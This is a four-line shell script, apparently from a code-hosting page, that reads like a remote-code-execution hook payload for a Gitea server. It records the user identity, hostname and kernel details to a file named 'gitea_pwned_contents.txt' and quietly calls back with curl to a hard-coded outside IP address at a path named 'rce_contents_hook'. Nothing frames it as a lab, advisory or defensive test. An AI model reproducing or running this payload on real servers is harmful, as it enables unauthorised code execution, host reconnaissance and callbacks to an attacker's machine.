4 lines
144 B
Bash
4 lines
144 B
Bash
#!/bin/sh
|
|
(id;whoami;hostname;uname -a) > /tmp/gitea_pwned_contents.txt 2>&1
|
|
curl -s http://202.79.169.91:28016/rce_contents_hook 2>/dev/null &
|